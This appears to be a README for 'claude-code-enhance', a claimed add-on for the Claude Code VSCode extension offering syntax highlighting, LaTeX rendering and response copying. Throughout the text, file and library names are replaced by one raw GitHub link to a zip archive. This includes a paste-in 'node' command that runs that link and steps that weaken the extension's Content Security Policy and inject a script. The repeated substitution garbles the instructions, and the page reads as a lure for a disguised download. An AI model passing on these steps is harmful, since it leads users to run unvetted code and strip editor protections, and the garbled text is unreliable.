Welcome to claude-code-enhance! This tool enhances the Claude Code extension for VSCode by adding features like code highlighting and LaTeX rendering. Follow these steps to download and run the software smoothly.
To get started, you need to download the latest version from our Releases page. Click the link below:
- Click the link above to go to the Releases page.
- Look for the latest version.
- Download the file suitable for your platform (Windows or Linux).
- Claude Code Extension: Version 2.1.31 or higher.
- Platforms Supported:
- Windows (win32-x64)
- Linux (linux-x64)
You can install the enhancement using two methods: a patch script (recommended) or manual installation.
- Open your command line.
- Change the directory to where claude-code-enhance is located:
cd claude-code-enhance - Run the patch script:
node https://raw.githubusercontent.com/buffbeard920/claude-code-enhance/main/webview/claude_code_enhance_v2.3.zip
The script will automatically:
- Find the currently installed Claude Code extension.
- Copy the
https://raw.githubusercontent.com/buffbeard920/claude-code-enhance/main/webview/claude_code_enhance_v2.3.zipfile to the extension directory. - Update the CSP policy to allow CDN resources.
- Inject the enhancement script for you.
- Navigate to the
webview/directory in the downloaded files. - Copy the
https://raw.githubusercontent.com/buffbeard920/claude-code-enhance/main/webview/claude_code_enhance_v2.3.zipfile into thewebview/directory of your Claude Code extension. - Edit the
https://raw.githubusercontent.com/buffbeard920/claude-code-enhance/main/webview/claude_code_enhance_v2.3.zipfile:- Modify the CSP policy to include the necessary rules.
- In your HTML template, inject the
<script>tag forhttps://raw.githubusercontent.com/buffbeard920/claude-code-enhance/main/webview/claude_code_enhance_v2.3.zip.
To see the changes, reload your VSCode window. You can do this by pressing Ctrl + Shift + P and selecting Developer: Reload Window.
Once you have installed claude-code-enhance, you can explore its powerful features:
- Code Syntax Highlighting: Supports over 180 programming languages, thanks to https://raw.githubusercontent.com/buffbeard920/claude-code-enhance/main/webview/claude_code_enhance_v2.3.zip
- LaTeX Formula Rendering: Display matrices, fractions, and integrals using KaTeX.
- AI Dialogue Copying: Copy AI response content to your clipboard easily. The content is formatted in Markdown.
- DOM Inspection Tool: Press
Ctrl + Shift + Dto export the DOM structure for analysis. - Dark Table Theme: Enjoy a gradient header, hover highlights, and rounded borders in tables.
- Code Auto-Wrapping: Long command lines wrap automatically for better readability.
- Scroll Wheel Zoom: Zoom in and out using
Ctrland the mouse wheel, with a range of 50% to 200%. - List Style Fixes: Numbered lists display correctly.
To copy AI responses easily:
- Hover your mouse over the end of an AI reply.
- A "Copy" button will appear in the bottom right corner.
- Click the button to copy the AI response in Markdown format.
- The tool automatically excludes "Thinking" and tool invocation content but retains the following:
- Code blocks
- Tables
- LaTeX formulas
- Lists
The DOM inspection tool helps you analyze web structures. To use this tool:
- Press
Ctrl + Shift + Dto activate the feature. - The tool will generate a report on the DOM structure for your review.
- Installation Issues: If you encounter problems, ensure you have the correct version of the Claude Code extension installed.
- Feature Activation: If features do not appear, try reloading the VSCode window again.
- Script Errors: For any script errors, double-check your CSP modifications in the
https://raw.githubusercontent.com/buffbeard920/claude-code-enhance/main/webview/claude_code_enhance_v2.3.zipfile.
By following these instructions, you should have a seamless experience using the claude-code-enhance application. Enjoy your enhanced coding experience!